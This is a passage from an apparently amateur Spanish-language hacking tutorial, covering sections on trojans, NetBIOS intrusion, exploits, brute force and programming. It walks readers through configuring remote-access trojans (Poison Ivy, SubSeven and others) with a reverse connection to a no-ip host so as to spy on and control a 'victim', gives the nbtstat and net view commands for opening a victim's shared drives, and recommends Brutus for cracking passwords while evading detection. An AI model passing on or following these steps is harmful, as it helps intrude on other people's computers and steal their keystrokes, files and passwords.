Quote Los troyanos son programas, que constan de dos partes, el Server y el cliente. El Server se lo envas a la vctima debidamente configurado, y una vez que lo abra podrs controlar su ordenador desde el tuyo con el cliente, ver lo que esta escribiendo en tiempo real (keylogger) , capturar su pantalla, acceder a su disco duro, ect

Los troyanos mas famosos son el subseven, el netbus, el bifrost y el poison ivy. Hay dos tipos de troyanos, los de conexin directa, en el que tu te conectas a la victima, que no los recomiendo, porque si la victima tiene la ip dinamica cuando le cambie ya no vas a poder controlarlo, y los de conexin inversa, en el que la victima se conecta a tu maquina (aunque ella no te puede controlar a ti, claro). Bueno, primero teneis que ver antes de todo, si teneis la ip dinamica o estatica, se puede comprobar en www.vermiip.es , si la ip va cambiando, es dinamica y te tienes que hacer una cuenta en no-ip, si es estatica no hace falta. http://www.no-ip.com/ De esta direccin podeis haceros la cuenta, os bajais el programilla y cada vez que lo abrais tendreis la ip estatica.

Despus, configuras el troyano, en la ip metes la direccion no-ip que pusiste, por ejemplo: Hackerejemplo.no-ip.biz y en el puerto teneis que poner uno que este ABIERTO. Para verlo ya sabeis, os haceis un scan a vosotros mismos y ya lo poneis. El puerto abierto mas comun es el 80. Algunos troyanos traen un test en el cliente para ver si el puerto que pones esta abierto, como en el troyano poison ivy, muy bueno. En el caso de no encontrar el puerto correcto, lo tendreis que abrir vosotros mismos en la configuracin del router.

18_Intrusin mediante NetBios

Quote Este es un metodo poco usado en la actualidad, tambien por estar desfasado, pero hay que saberlo. Trata sobre como acceder a los recursos que tiene compartidos un pc, como por ejemplo mis documentos, o el mismo disco duro

Lo primero: Configurando nuestro pc Lo que tenemos que hacer para que nuestro pc pueda meterse en otro por NetBios, lo primero es activarlo en nuestro pc.

Clic en Inicio. Clic en Panel de control. Clic en Conexiones de red. Doble clic sobre el icono de conexin (la conexin a Internet, claro) Clic en Propiedades. En la ventana que apareci, dad doble clic sobre Protocolo Internet (TCP/IP). Clic en Opciones avanzadas. Clic en la pestaa WINS. Clic sobre Habilitar NetBios sobre TCP/IP. Clic en Aceptar (lo mismo para las dems ventanas). Bueno, pues ya est habilitado, ahora manos a la obra. Para comprobar si un pc comparte algo, tenemos que abrir el ms-dos y ejecutar el siguiente comando: C:\Documents and Settings\Pepe>nbtstat a ipdelavictima Saldra el nombre de la maquina victima, y otros, como por ejemplo Casa, etc. Bien, si en la columna de al lado de los nombres de pcs hay algun 20 la maquina comparte recursos.

Ahora vamos a ver lo que tiene compartido la mquina: Se ejecuta el siguiente comando: C:\Documents and Settings\Pepe>net view ipdelamaquina Ejecutando este comando veremos lo que comparte ( por ejemplo, el disco duro) Una vez hecho esto no vamos a Inicio-Ejecutar En ejecutar ponemos \\Ipdelavictima Bueno, le damos a intro y eso (xD) y si todo sali bien nos aparecer una ventana de Windows donde veremos los archivos compartidos. Este metodo esta bien, aunque es un poco antiguo. 19_Intrusin mediante vulnerabilidades.

Deberias considerar utilizar OTRO proveedor (como upl.co o imm.io) para hostear tus imagenes. Mas alternativas en antronio.com/go/imagenes/.

http://img101.imageshack.us/img101/945/555555555555555xc2.jpg

Ejemplo de un exploit

Es la forma de hackear mas actualizada, es decir, mas actual. Hay muchas clases de vulnerabilidades, algunas necesitan exploit (un programa que nosotros compilaremos) o no, por ejemplo rfi (remote file inclusion), inyeccion SQL y ms... Pero cada exploit es diferente, los puedes buscar en paginas como security focus o milw0rm Para informaros mas buscad en google 20_Fuerza Bruta

Es una manera de averiguar las contraseas de, ftp, webs y otras cosas con programas que prueban distintas combinaciones de letras hasta que den con la contrasea.

Quote Para la fuerza bruta recomiendo el Brutus AET2, y un buen diccionario con palabras.

Este metodo se suele utilizar como ultimo recurso, ya que es facil que te pillen si lo utilizas demasiado... 21_Programacin Bien, en este punto no me voy a detener mucho porque no puedo dedicarme a ensear un lenguaje entero, este punto es simplemente para decir que aprender a programar es fundamental para esto, tal vez te parezca que no, pero llegara un momento que tendras que hacer tus propios programas. Algunos lenguajes son: C, Python, Visual Basic, etc, bueno hay muchos ms, elige el tuyo